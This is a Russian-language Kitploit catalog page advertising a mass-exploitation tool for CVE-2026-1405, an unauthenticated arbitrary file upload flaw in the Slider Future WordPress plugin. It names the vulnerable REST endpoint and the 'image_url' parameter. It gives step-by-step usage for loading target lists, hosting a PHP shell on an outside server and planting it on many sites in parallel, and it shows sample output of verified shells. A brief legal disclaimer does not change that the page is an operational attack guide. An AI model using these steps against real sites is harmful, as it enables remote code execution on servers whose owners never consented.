Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/nxploited/cve-2026-1405
Генерация полезной нагрузкиЭксплуатацияСкриптинг и автоматизацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubnxploited/cve-2026-1405

CVE-2026-1405

Slider Future <= 1.0.5 — Неавторизованная произвольная загрузка файлов

Репозиторий
4116 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-1405

Slider Future <= 1.0.5 – Неаутентифицированная произвольная загрузка файлов

🚀 CVE-2026-1405.py — Slider Future Mass Exploit Tool

🩸 Обзор уязвимости

Компонент: Slider Future (плагин WordPress)
Затронутые версии: ≤ 1.0.5
Уязвимость: Неаутентифицированная произвольная загрузка файлов
CVE: CVE-2026-1405
Оценка CVSS: 9.8 (Критический)

Плагин Slider Future для WordPress уязвим к произвольной загрузке файлов из-за отсутствия проверки типа файла в функции slider_future_handle_image_upload во всех версиях до 1.0.5 включительно. Это позволяет неаутентифицированным злоумышленникам загружать любые типы файлов, включая вредоносные PHP-шеллы, непосредственно на атакуемый сервер, что обеспечивает удалённое выполнение кода.


⚡ Возможности эксплойта

  • Массовая эксплуатация множества целей.
  • Использует уязвимую конечную точку: /wp-json/slider-future/v1/upload-image/
  • Загружает удалённый PHP-шелл через параметр image_url (без аутентификации).
  • Автоматически проверяет выполнение шелла, сверяя заданную сигнатуру.

  • 🛠️ Инструкция по использованию

    1. Подготовьте текстовый файл со списком целевых сайтов WordPress (по одному на строку):

    root@kitploit:~
    http://example1.com
    https://example2.com
    ...
    

    2. Разместите ваш PHP-шелл в интернете и подготовьте его прямой URL.

    Пример: http://yourserver.com/shell.php

    3. Запустите скрипт:

    root@kitploit:~
    python3 CVE-2026-1405.py
    

    Вас попросят ввести:

    • Файл с целями: путь к вашему списку целей (по умолчанию list.txt)
    • Прямой URL шелла: общедоступный URL вашего шелла для загрузки на цели
    • Сигнатура шелла: уникальная строка в вашем шелле для проверки (например, Nxploited)
    • Потоки: количество параллельных потоков (по умолчанию 10)

    4. Вывод

    • Результаты эксплуатации отображаются в реальном времени через профессиональный интерфейс Rich.
    • Успешные цели и URL шеллов автоматически сохраняются в success_results.txt.

    📝 Детали скрипта

    • Название: CVE-2026-1405.py
    • Автор: Nxploited
    • Язык: Python 3
    • Библиотеки: requests, rich

    Как это работает

    1. Отправляет POST-запрос к уязвимой конечной точке каждой цели:
      • URL: /wp-json/slider-future/v1/upload-image/
      • Параметр: image_url, указывающий на ваш шелл.
    2. Разбирает JSON-ответ для извлечения URL загруженного шелла.
    3. Переходит по URL шелла и ищет вашу сигнатуру.
    4. Отображает статус: успех или неудача для каждой цели.

    ⚠️ Правовое предупреждение

    Этот инструмент предназначен только для образовательного и авторизованного тестирования безопасности.
    Несанкционированное использование против сайтов, которыми вы не владеете или на тестирование которых у вас нет явного разрешения, является незаконным.


    💡 Пример вывода

    root@kitploit:~
    Exploit For: CVE-2026-1405
    By: Nxploited
    
    Targets loaded: 12
    Shell URL: http://yourserver.com/shell.php
    Signature: Nxploited
    
    2026-02-20T16:05:23.123456+00:00 | http://target1.com -> SUCCESS | Shell Verified: http://target1.com/wp-content/uploads/2026/02/shell.php
    2026-02-20T16:05:24.542342+00:00 | http://target2.com -> Upload failed or shell URL not found.
    ...
    Finished: 3/12 succeeded in 14.7s
    Saved successes to success_results.txt
    
    Скачать инструмент